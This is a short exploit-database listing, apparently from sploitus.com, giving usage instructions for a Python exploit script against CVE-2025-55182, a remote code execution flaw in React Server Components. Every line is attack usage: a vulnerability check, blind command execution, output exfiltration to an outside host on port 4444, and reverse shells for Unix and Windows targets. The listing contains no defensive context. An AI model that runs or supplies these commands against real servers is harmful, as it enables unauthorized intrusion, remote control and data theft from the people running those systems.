Share
## https://sploitus.com/exploit?id=4A36B627-478D-53BD-9C98-44FBCD4BDC14
CVE-2025-55182 React Server Components RCE Exploit

USAGE:
  # Check if vulnerable
  python3 exploit_rce.py http://target:3000 --check
  
  # Execute command (blind)
  python3 exploit_rce.py http://target:3000 -c "id"
  
  # Execute command with output exfiltration
  python3 exploit_rce.py http://target:3000 --exfil "id" 10.0.0.1 4444
  
  # Reverse shell (pure Node.js, auto-detects Windows/Unix)
  python3 exploit_rce.py http://target:3000 --revshell 10.0.0.1 4444
  
  # Reverse shell - force Windows mode (cmd.exe)
  python3 exploit_rce.py http://target:3000 --revshell 10.0.0.1 4444 --windows